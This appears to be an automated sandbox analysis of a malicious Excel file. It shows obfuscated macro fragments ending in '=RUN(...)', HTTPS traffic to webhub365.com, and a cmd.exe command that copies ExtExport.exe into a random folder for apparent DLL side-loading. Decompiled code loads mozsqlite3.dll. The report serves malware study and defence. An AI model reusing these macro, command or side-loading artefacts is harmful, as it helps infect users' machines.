,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,I,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,6,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,E,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,mxUXwaSU= $F$204&$H$481&$K$324&$N$11&$N$11&$E$78&$I$228,,,,,,,,,,,,,,,,,,,,,,id9nB5my= $D$167,,,,,,,,,,,,,,,,,,,,,,=$F$105(),,,,,,,,,,,,,,,,,,,,,,=RUN($R$247),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

          Network Behavior

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Jun 11, 2021 00:01:02.782792091 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:01:02.840646982 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:02.840765953 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:01:02.850260973 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:01:02.906337976 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:02.907385111 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:02.907407999 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:02.907428980 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:02.907445908 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:02.907556057 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:01:02.909708023 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:01:02.911695957 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:02.911792994 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:01:02.933043003 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:01:02.994394064 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:02.994493008 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:01:04.609034061 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:01:04.707235098 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:04.792618036 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:04.792836905 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:02:19.796137094 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:02:19.796156883 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:02:19.796312094 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:02:19.796360016 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:03:02.591763020 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:03:02.591799974 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:03:02.649141073 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:03:02.649348021 CEST49167443192.168.2.22198.244.146.96

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Jun 11, 2021 00:01:02.692508936 CEST5219753192.168.2.228.8.8.8
          Jun 11, 2021 00:01:02.758696079 CEST53521978.8.8.8192.168.2.22
          Jun 11, 2021 00:01:03.308579922 CEST5309953192.168.2.228.8.8.8
          Jun 11, 2021 00:01:03.360682964 CEST53530998.8.8.8192.168.2.22
          Jun 11, 2021 00:01:03.372205019 CEST5283853192.168.2.228.8.8.8
          Jun 11, 2021 00:01:03.423459053 CEST53528388.8.8.8192.168.2.22
          Jun 11, 2021 00:01:04.013695955 CEST6120053192.168.2.228.8.8.8
          Jun 11, 2021 00:01:04.068691969 CEST53612008.8.8.8192.168.2.22
          Jun 11, 2021 00:01:04.076139927 CEST4954853192.168.2.228.8.8.8
          Jun 11, 2021 00:01:04.139476061 CEST53495488.8.8.8192.168.2.22

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
          Jun 11, 2021 00:01:02.692508936 CEST192.168.2.228.8.8.80x6029Standard query (0)webhub365.comA (IP address)IN (0x0001)

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
          Jun 11, 2021 00:01:02.758696079 CEST8.8.8.8192.168.2.220x6029No error (0)webhub365.com198.244.146.96A (IP address)IN (0x0001)

          HTTPS Packets

          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
          Jun 11, 2021 00:01:02.911695957 CEST198.244.146.96443192.168.2.2249167CN=webhub365.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Jun 08 19:53:43 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Mon Sep 06 19:53:43 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
          CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
          CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024

          Code Manipulations

          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          General

          Start time:00:00:38
          Start date:11/06/2021
          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          Wow64 process (32bit):false
          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Imagebase:0x13f660000
          File size:27641504 bytes
          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:00:00:43
          Start date:11/06/2021
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
          Imagebase:0x4a6e0000
          File size:345088 bytes
          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:00:00:45
          Start date:11/06/2021
          Path:C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
          Wow64 process (32bit):true
          Commandline:'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7
          Imagebase:0x3a0000
          File size:25600 bytes
          MD5 hash:7F7F391491C315A4A72EFCAC0D34FA93
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 0%, Virustotal, Browse
          • Detection: 2%, Metadefender, Browse
          • Detection: 0%, ReversingLabs
          Reputation:low

          Disassembly

          Code Analysis

          Reset < >

            Execution Graph

            Execution Coverage:8%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:6.2%
            Total number of Nodes:340
            Total number of Limit Nodes:6

            Graph

            execution_graph 1144 3a4bba SetUnhandledExceptionFilter 1145 3a490b 1146 3a4917 1145->1146 1147 3a493c 1146->1147 1148 3a4943 Sleep 1146->1148 1149 3a495b _amsg_exit 1147->1149 1151 3a4965 __initterm_e 1147->1151 1148->1146 1149->1151 1150 3a49a7 _initterm 1152 3a49c2 __IsNonwritableInCurrentImage 1150->1152 1151->1150 1151->1152 1155 3a4988 1151->1155 1159 3a31c6 1152->1159 1156 3a4a19 exit _XcptFilter 1157 3a4a4f 1156->1157 1157->1155 1158 3a4a58 _cexit 1157->1158 1158->1155 1177 3a47e2 1159->1177 1162 3a3249 1163 3a3253 SHAnsiToUnicode 1162->1163 1164 3a32d3 1162->1164 1163->1164 1167 3a3270 SHAnsiToUnicode 1163->1167 1193 3a4aad 1164->1193 1165 3a3200 rand_s 1165->1162 1168 3a3219 1165->1168 1167->1164 1170 3a3281 SHAnsiToUnicode 1167->1170 1168->1162 1171 3a322c VirtualAlloc 1168->1171 1169 3a32e2 1169->1156 1169->1157 1170->1164 1172 3a3292 1170->1172 1171->1162 1171->1171 1180 3a230e 1172->1180 1175 3a32c8 1198 3a3047 1175->1198 1178 3a47eb GetVersionExA 1177->1178 1179 3a31e5 1177->1179 1178->1179 1179->1162 1179->1165 1242 3a2225 1180->1242 1183 3a2225 _vsnwprintf 1184 3a2363 LoadLibraryExW LoadLibraryExW 1183->1184 1185 3a23d3 17 API calls 1184->1185 1186 3a2397 1184->1186 1188 3a2519 1185->1188 1189 3a250c 1185->1189 1187 3a2225 _vsnwprintf 1186->1187 1190 3a23b3 LoadLibraryExW 1187->1190 1191 3a4aad 4 API calls 1188->1191 1189->1188 1190->1185 1190->1188 1192 3a2528 1191->1192 1192->1164 1192->1175 1194 3a4ab8 1193->1194 1195 3a4ab5 1193->1195 1246 3a4f4c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 1194->1246 1195->1169 1197 3a5087 1197->1169 1199 3a306d 1198->1199 1200 3a3095 1199->1200 1201 3a3075 CreateFileW 1199->1201 1203 3a4aad 4 API calls 1200->1203 1201->1200 1202 3a309c 1201->1202 1247 3a2c23 1202->1247 1205 3a31bd 1203->1205 1205->1164 1209 3a2cd4 8 API calls 1210 3a30be 1209->1210 1211 3a2cd4 8 API calls 1210->1211 1212 3a30ca 1211->1212 1213 3a2cd4 8 API calls 1212->1213 1214 3a30d6 1213->1214 1265 3a2d9c 1214->1265 1217 3a313d 1309 3a2986 1217->1309 1218 3a30f3 1291 3a32eb SHGetFolderPathAndSubDirW 1218->1291 1223 3a3186 1225 3a2cd4 8 API calls 1223->1225 1224 3a310f 1227 3a2cd4 8 API calls 1224->1227 1228 3a3191 CloseHandle 1225->1228 1226 3a2cd4 8 API calls 1229 3a3167 1226->1229 1230 3a311e 1227->1230 1317 3a2beb 1228->1317 1232 3a2cd4 8 API calls 1229->1232 1233 3a2cd4 8 API calls 1230->1233 1235 3a3171 1232->1235 1234 3a3128 1233->1234 1236 3a2d9c 24 API calls 1234->1236 1237 3a2d9c 24 API calls 1235->1237 1238 3a3133 1236->1238 1239 3a317c 1237->1239 1240 3a2cd4 8 API calls 1238->1240 1241 3a2cd4 8 API calls 1239->1241 1240->1217 1241->1223 1243 3a2234 1242->1243 1244 3a2244 _vsnwprintf 1243->1244 1245 3a2264 1243->1245 1244->1245 1245->1183 1246->1197 1248 3a2c32 1247->1248 1249 3a2c4e WriteFile 1248->1249 1250 3a2c76 1248->1250 1249->1249 1249->1250 1324 3a2ba1 _vsnwprintf 1250->1324 1254 3a4aad 4 API calls 1255 3a2ccb 1254->1255 1256 3a2cd4 1255->1256 1257 3a2ce3 1256->1257 1258 3a2d2a 1257->1258 1259 3a2d06 WriteFile 1257->1259 1260 3a2ba1 _vsnwprintf 1258->1260 1259->1258 1259->1259 1261 3a2d3c WriteFile WriteFile 1260->1261 1263 3a4aad 4 API calls 1261->1263 1264 3a2d93 1263->1264 1264->1209 1266 3a2dab 1265->1266 1267 3a2225 _vsnwprintf 1266->1267 1268 3a2f45 1266->1268 1270 3a2df2 1267->1270 1269 3a2225 _vsnwprintf 1268->1269 1272 3a3015 1268->1272 1281 3a2f75 1269->1281 1270->1268 1326 3a28d3 1270->1326 1273 3a4aad 4 API calls 1272->1273 1275 3a303e LoadLibraryExW 1273->1275 1274 3a2f38 1276 3a2beb 3 API calls 1274->1276 1275->1217 1275->1218 1276->1268 1277 3a2e6d lstrcmpW 1286 3a2e34 1277->1286 1278 3a2e4d lstrcmpW 1280 3a2e5d lstrcmpW 1278->1280 1278->1286 1280->1277 1280->1286 1281->1272 1284 3a300a 1281->1284 1285 3a2cd4 8 API calls 1281->1285 1340 3a2809 1281->1340 1283 3a28d3 2 API calls 1283->1286 1287 3a2beb 3 API calls 1284->1287 1285->1281 1286->1274 1286->1277 1286->1278 1286->1283 1288 3a2cd4 8 API calls 1286->1288 1289 3a2f16 ??3@YAXPAX 1286->1289 1290 3a2d9c 20 API calls 1286->1290 1330 3a2a22 1286->1330 1287->1272 1288->1286 1289->1286 1290->1286 1292 3a339c SHGetFolderPathAndSubDirW 1291->1292 1293 3a332d #672 1291->1293 1294 3a33ba SHSetLocalizedName 1292->1294 1306 3a33d6 1292->1306 1295 3a3343 SHSetLocalizedName 1293->1295 1296 3a3367 1293->1296 1299 3a3772 11 API calls 1294->1299 1363 3a3772 1295->1363 1375 3a389c 1296->1375 1297 3a4aad 4 API calls 1302 3a3102 FreeLibrary 1297->1302 1299->1306 1302->1217 1302->1224 1304 3a3371 #672 1305 3a3381 1304->1305 1304->1306 1396 3a35ee LoadStringW 1305->1396 1306->1297 1310 3a29b8 1309->1310 1311 3a2225 _vsnwprintf 1310->1311 1312 3a29fc 1310->1312 1315 3a29d4 1311->1315 1313 3a4aad 4 API calls 1312->1313 1314 3a2a17 1313->1314 1314->1223 1314->1226 1315->1312 1316 3a28d3 2 API calls 1315->1316 1316->1312 1318 3a2bfd ??3@YAXPAX 1317->1318 1319 3a2c03 1317->1319 1318->1319 1320 3a2c09 ??3@YAXPAX 1319->1320 1321 3a2c0f 1319->1321 1320->1321 1322 3a2c1b 1321->1322 1323 3a2c15 ??3@YAXPAX 1321->1323 1322->1200 1323->1322 1325 3a2bc7 WriteFile 1324->1325 1325->1254 1328 3a28e6 1326->1328 1327 3a2948 1327->1286 1328->1327 1348 3a264a 1328->1348 1331 3a2a49 1330->1331 1332 3a2b24 1331->1332 1333 3a2225 _vsnwprintf 1331->1333 1334 3a4aad 4 API calls 1332->1334 1336 3a2a76 1333->1336 1335 3a2b52 1334->1335 1335->1286 1336->1332 1337 3a2ade ??2@YAPAXI 1336->1337 1337->1332 1338 3a2b02 1337->1338 1338->1332 1339 3a2b31 ??3@YAXPAX 1338->1339 1339->1332 1341 3a281c 1340->1341 1342 3a264a 2 API calls 1341->1342 1347 3a28bc 1341->1347 1343 3a2886 1342->1343 1343->1347 1353 3a26c4 1343->1353 1345 3a28a1 1345->1347 1358 3a273e 1345->1358 1347->1281 1349 3a265a ??3@YAXPAX 1348->1349 1350 3a2667 1348->1350 1349->1350 1351 3a267d ??2@YAPAXI 1350->1351 1352 3a26a3 1350->1352 1351->1352 1352->1327 1354 3a26d4 ??3@YAXPAX 1353->1354 1355 3a26e1 1353->1355 1354->1355 1355->1355 1356 3a26f7 ??2@YAPAXI 1355->1356 1357 3a271d 1355->1357 1356->1357 1357->1345 1359 3a274e ??3@YAXPAX 1358->1359 1360 3a275b 1358->1360 1359->1360 1360->1360 1361 3a2771 ??2@YAPAXI 1360->1361 1362 3a2797 1360->1362 1361->1362 1362->1347 1413 3a3a1b 1363->1413 1365 3a379a RegOpenKeyExW 1368 3a3796 1365->1368 1366 3a37cf RegDeleteValueW 1366->1368 1367 3a3887 1369 3a4aad 4 API calls 1367->1369 1368->1365 1368->1366 1368->1367 1370 3a386f RegCloseKey 1368->1370 1371 3a3a1b 6 API calls 1368->1371 1421 3a479b ExpandEnvironmentStringsW 1368->1421 1372 3a335f #675 1369->1372 1370->1368 1371->1368 1372->1296 1374 3a382b RegDeleteValueW 1374->1368 1376 3a38c0 GetModuleFileNameW 1375->1376 1377 3a38fd 1375->1377 1376->1377 1378 3a38dc PathFindFileNameW StrCmpICW 1376->1378 1379 3a4aad 4 API calls 1377->1379 1378->1377 1380 3a3903 StrCmpICW 1378->1380 1381 3a336c 1379->1381 1380->1377 1382 3a3917 StrCmpICW 1380->1382 1381->1304 1381->1306 1382->1377 1383 3a3927 StrCmpICW 1382->1383 1383->1377 1384 3a3937 StrCmpICW 1383->1384 1384->1377 1385 3a3947 StrCmpICW 1384->1385 1385->1377 1386 3a3957 StrCmpICW 1385->1386 1386->1377 1387 3a3967 StrCmpICW 1386->1387 1387->1377 1388 3a3973 StrCmpICW 1387->1388 1388->1377 1389 3a397f StrCmpICW 1388->1389 1389->1377 1390 3a398b StrCmpICW 1389->1390 1390->1377 1391 3a399e StrCmpICW 1390->1391 1391->1377 1392 3a39b1 StrCmpICW 1391->1392 1392->1377 1393 3a39c4 StrCmpICW 1392->1393 1393->1377 1394 3a39d7 StrCmpICW 1393->1394 1394->1377 1395 3a39ea StrCmpICW 1394->1395 1395->1377 1397 3a3632 1396->1397 1401 3a3646 1396->1401 1423 3a3407 1397->1423 1399 3a3754 1400 3a4aad 4 API calls 1399->1400 1403 3a3392 #675 1400->1403 1401->1399 1406 3a367f 1401->1406 1429 3a3472 LoadStringW 1401->1429 1403->1306 1404 3a3697 LoadStringW 1404->1406 1405 3a3407 12 API calls 1405->1406 1406->1404 1406->1405 1407 3a36ce PathFileExistsW 1406->1407 1408 3a36fd 1406->1408 1407->1406 1408->1399 1409 3a370d PathFileExistsW 1408->1409 1410 3a371e CreateDirectoryW 1409->1410 1411 3a3730 1409->1411 1410->1399 1410->1411 1411->1399 1439 3a3528 LoadStringW 1411->1439 1414 3a3a39 1413->1414 1415 3a3a95 1413->1415 1417 3a2ba1 _vsnwprintf 1414->1417 1416 3a4aad 4 API calls 1415->1416 1418 3a3a9f 1416->1418 1420 3a3a54 1417->1420 1418->1368 1419 3a3a7d DecodePointer 1419->1415 1420->1415 1420->1419 1422 3a47bc 1421->1422 1422->1374 1424 3a3434 1423->1424 1425 3a3444 1424->1425 1450 3a4672 1424->1450 1427 3a4aad 4 API calls 1425->1427 1428 3a3467 1427->1428 1428->1401 1430 3a34a4 1429->1430 1432 3a34b8 1429->1432 1431 3a3407 12 API calls 1430->1431 1431->1432 1433 3a3512 1432->1433 1436 3a34dc StrCmpNW 1432->1436 1434 3a4aad 4 API calls 1433->1434 1435 3a351d 1434->1435 1435->1401 1436->1433 1437 3a34ef StrStrW 1436->1437 1437->1433 1438 3a3505 DeleteFileW 1437->1438 1438->1433 1440 3a355d LoadStringW 1439->1440 1441 3a35d7 1439->1441 1443 3a3577 1440->1443 1446 3a358b 1440->1446 1442 3a4aad 4 API calls 1441->1442 1444 3a35e3 1442->1444 1445 3a3407 12 API calls 1443->1445 1444->1411 1445->1446 1446->1441 1447 3a4672 12 API calls 1446->1447 1448 3a35bf 1447->1448 1448->1441 1449 3a35c3 MoveFileW 1448->1449 1449->1441 1451 3a4682 1450->1451 1454 3a440a 1451->1454 1455 3a4652 1454->1455 1459 3a4451 1454->1459 1456 3a4aad 4 API calls 1455->1456 1457 3a4667 1456->1457 1457->1425 1458 3a445a 1458->1455 1460 3a464b LocalFree 1458->1460 1459->1458 1461 3a44d7 LocalAlloc 1459->1461 1462 3a44f3 1459->1462 1460->1455 1461->1458 1461->1462 1464 3a4537 iswalpha 1462->1464 1465 3a4521 1462->1465 1464->1465 1465->1458 1466 3a4083 1465->1466 1467 3a40a0 1466->1467 1468 3a4127 iswalpha 1467->1468 1469 3a4104 iswalpha 1467->1469 1471 3a428b 1467->1471 1473 3a40c5 1467->1473 1468->1473 1469->1473 1470 3a414e wcschr 1470->1473 1471->1458 1472 3a3d00 iswalpha iswalpha 1472->1473 1473->1470 1473->1471 1473->1472 1474 3a2299 1475 3a22b0 1474->1475 1476 3a22a3 1474->1476 1476->1475 1477 3a22ee FreeLibrary 1476->1477 1478 3a22f5 1476->1478 1477->1478 1478->1475 1479 3a22fe FreeLibrary 1478->1479 1479->1475 1480 3a4a9e 1483 3a4df8 1480->1483 1482 3a4aa3 1482->1482 1484 3a4e2a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 1483->1484 1485 3a4e1d 1483->1485 1486 3a4e21 1484->1486 1485->1484 1485->1486 1486->1482 1517 3a480d 1519 3a481b 1517->1519 1526 3a4c48 GetModuleHandleA 1519->1526 1520 3a4879 __set_app_type __p__fmode __p__commode 1521 3a48b1 1520->1521 1522 3a48ba __setusermatherr 1521->1522 1523 3a48c6 1521->1523 1522->1523 1528 3a4e9f _controlfp 1523->1528 1525 3a48cb 1527 3a4c59 1526->1527 1527->1520 1528->1525 1487 3a4b72 1488 3a4baf 1487->1488 1490 3a4b84 1487->1490 1489 3a4ba9 ?terminate@ 1489->1488 1490->1488 1490->1489 1529 3a4f22 _except_handler4_common 1491 3a3e93 1492 3a3ea1 1491->1492 1492->1492 1493 3a3eb4 1492->1493 1495 3a3d00 1492->1495 1496 3a3d13 1495->1496 1500 3a3d40 1495->1500 1497 3a3d1f iswalpha 1496->1497 1496->1500 1498 3a3d2d 1497->1498 1499 3a3da6 iswalpha 1498->1499 1498->1500 1499->1500 1500->1493 1501 3a48d3 __getmainargs 1502 3a4b56 1505 3a4ac2 1502->1505 1504 3a4b63 1506 3a4ace 1505->1506 1507 3a4aeb _lock __dllonexit 1506->1507 1508 3a4adf _onexit 1506->1508 1511 3a4b48 _unlock 1507->1511 1510 3a4b3d 1508->1510 1510->1504 1511->1510 1530 3a3ee7 1531 3a3f00 1530->1531 1536 3a3f4f 1530->1536 1532 3a3f26 wcschr 1531->1532 1534 3a3f93 1531->1534 1531->1536 1533 3a3f39 wcschr 1532->1533 1532->1536 1533->1536 1535 3a3fc3 iswalpha 1534->1535 1534->1536 1535->1536 1512 3a4a34 1513 3a4a48 _exit 1512->1513 1514 3a4a4f 1512->1514 1513->1514 1515 3a4a58 _cexit 1514->1515 1516 3a4a63 1514->1516 1515->1516

            Callgraph

            • Executed
            • Not Executed
            • Opacity -> Relevance
            • Disassembly available
            callgraph 0 Function_003A4BBA 1 Function_003A27B8 51 Function_003A27E8 1->51 2 Function_003A273E 57 Function_003A25DB 2->57 3 Function_003A2533 4 Function_003A4A34 30 Function_003A4F09 4->30 5 Function_003A4C2A 5->30 6 Function_003A3AA8 74 Function_003A3C46 6->74 7 Function_003A3528 8 Function_003A4AAD 7->8 39 Function_003A3407 7->39 43 Function_003A4672 7->43 7->57 68 Function_003A4F4C 8->68 9 Function_003A2A22 9->1 9->8 16 Function_003A2225 9->16 20 Function_003A259E 9->20 9->57 59 Function_003A295F 9->59 60 Function_003A2B5D 9->60 10 Function_003A4F22 11 Function_003A2C23 11->8 14 Function_003A2BA1 11->14 71 Function_003A50C0 11->71 12 Function_003A3CA0 53 Function_003A476C 12->53 70 Function_003A46C3 12->70 13 Function_003A4CA0 15 Function_003A4C26 17 Function_003A3A1B 17->8 17->14 18 Function_003A479B 18->57 19 Function_003A2299 21 Function_003A4A9E 41 Function_003A4DF8 21->41 22 Function_003A4E9F 23 Function_003A2D9C 23->1 23->8 23->9 23->16 23->23 29 Function_003A2809 23->29 49 Function_003A2BEB 23->49 23->59 23->60 61 Function_003A28D3 23->61 64 Function_003A2CD4 23->64 23->71 24 Function_003A389C 24->8 25 Function_003A4712 26 Function_003A3E93 36 Function_003A3D00 26->36 27 Function_003A440A 27->6 27->8 35 Function_003A4083 27->35 47 Function_003A3DF5 27->47 28 Function_003A490B 28->30 46 Function_003A4CF0 28->46 48 Function_003A4A75 28->48 73 Function_003A31C6 28->73 77 Function_003A4EC4 28->77 29->2 29->20 29->51 65 Function_003A264A 29->65 76 Function_003A26C4 29->76 31 Function_003A230E 31->8 31->16 32 Function_003A4D8E 33 Function_003A4C8F 34 Function_003A480D 34->22 34->33 67 Function_003A4C48 34->67 35->6 35->12 35->36 38 Function_003A3B87 35->38 55 Function_003A3AE7 35->55 35->70 36->12 36->53 36->70 37 Function_003A2986 37->1 37->8 37->16 37->59 37->60 37->61 38->74 39->8 39->43 39->57 40 Function_003A4D7B 42 Function_003A3772 42->8 42->17 42->18 43->12 43->27 43->70 44 Function_003A3472 44->8 44->39 45 Function_003A4B72 46->13 72 Function_003A4DC0 46->72 47->55 50 Function_003A32EB 50->8 50->24 50->42 52 Function_003A35EE 50->52 50->57 52->7 52->8 52->39 52->44 53->25 53->70 54 Function_003A47E2 55->74 56 Function_003A3EE7 56->12 56->53 56->70 58 Function_003A4BD9 58->30 58->77 60->3 60->59 61->20 61->51 61->65 62 Function_003A48D3 63 Function_003A4B56 69 Function_003A4AC2 63->69 64->8 64->14 64->71 65->57 66 Function_003A4B48 67->58 69->30 69->66 69->77 73->8 73->31 73->54 75 Function_003A3047 73->75 75->8 75->11 75->23 75->37 75->49 75->50 75->59 75->64 76->57 78 Function_003A4B45

            Executed Functions

            Control-flow Graph

            C-Code - Quality: 87%
            			E003A230E(void* __edx, void* __eflags, intOrPtr _a4) {
            				signed int _v8;
            				short _v528;
            				short _v1048;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				struct HINSTANCE__* _t17;
            				struct HINSTANCE__* _t19;
            				_Unknown_base(*)()* _t24;
            				CHAR* _t46;
            				void* _t49;
            				signed int _t50;
            				signed int _t52;
            
            				_t49 = __edx;
            				_v8 =  *0x3a6004 ^ _t52;
            				_t51 = _a4;
            				_push(L"mozcrt19.dll");
            				_t50 = 0x80004005;
            				E003A2225( &_v1048, 0x104, L"%s\\%s", _a4);
            				_push(L"mozsqlite3.dll");
            				E003A2225( &_v528, 0x104, L"%s\\%s", _a4);
            				_t46 = LoadLibraryExW;
            				_t17 = LoadLibraryExW( &_v1048, 0, 0); // executed
            				 *0x3a644c = _t17;
            				_t19 = LoadLibraryExW( &_v528, 0, 0x1100); // executed
            				 *0x3a6448 = _t19;
            				if(_t19 != 0) {
            					L2:
            					_t51 = GetProcAddress;
            					 *0x3a656c = GetProcAddress(_t19, "sqlite3_open");
            					 *0x3a6670 = GetProcAddress( *0x3a6448, "sqlite3_open_v2");
            					 *0x3a6570 = GetProcAddress( *0x3a6448, "sqlite3_open16");
            					 *0x3a6530 = GetProcAddress( *0x3a6448, "sqlite3_exec");
            					_t24 = GetProcAddress( *0x3a6448, "sqlite3_free");
            					_t46 = "sqlite3_close";
            					 *0x3a653c = _t24;
            					 *0x3a6494 = GetProcAddress( *0x3a6448, _t46);
            					 *0x3a6624 = GetProcAddress( *0x3a6448, "sqlite3_prepare_v2");
            					 *0x3a6628 = GetProcAddress( *0x3a6448, "sqlite3_prepare16_v2");
            					 *0x3a64ac = GetProcAddress( *0x3a6448, "sqlite3_column_count");
            					 *0x3a64c4 = GetProcAddress( *0x3a6448, "sqlite3_column_int");
            					 *0x3a64c8 = GetProcAddress( *0x3a6448, "sqlite3_column_int64");
            					 *0x3a64e4 = GetProcAddress( *0x3a6448, "sqlite3_column_text");
            					 *0x3a64e8 = GetProcAddress( *0x3a6448, "sqlite3_column_text16");
            					 *0x3a65cc = GetProcAddress( *0x3a6448, "sqlite3_step");
            					 *0x3a6588 = GetProcAddress( *0x3a6448, "sqlite3_reset");
            					 *0x3a6538 = GetProcAddress( *0x3a6448, "sqlite3_finalize");
            					 *0x3a6494 = GetProcAddress( *0x3a6448, _t46);
            					if( *0x3a6448 != 0) {
            						asm("sbb eax, eax");
            						_t50 = _t50 &  !( ~( *0x3a6570));
            					}
            					L4:
            					return E003A4AAD(_t50, _t46, _v8 ^ _t52, _t49, _t50, _t51);
            				}
            				_push(L"sqlite3.dll");
            				E003A2225( &_v528, 0x104, L"%s\\%s", _t51);
            				_t19 = LoadLibraryExW( &_v528, 0, 0x1100); // executed
            				 *0x3a6448 = _t19;
            				if(_t19 == 0) {
            					goto L4;
            				}
            				goto L2;
            			}
















            0x003a230e
            0x003a2320
            0x003a2325
            0x003a232f
            0x003a233a
            0x003a2346
            0x003a234b
            0x003a235e
            0x003a2363
            0x003a2377
            0x003a237e
            0x003a238c
            0x003a238e
            0x003a2395
            0x003a23d3
            0x003a23d3
            0x003a23ec
            0x003a23fe
            0x003a2410
            0x003a2422
            0x003a2427
            0x003a2429
            0x003a242e
            0x003a2447
            0x003a2459
            0x003a246b
            0x003a247d
            0x003a248f
            0x003a24a1
            0x003a24b3
            0x003a24c5
            0x003a24d7
            0x003a24e9
            0x003a24f7
            0x003a2505
            0x003a250a
            0x003a2513
            0x003a2517
            0x003a2517
            0x003a2519
            0x003a252b
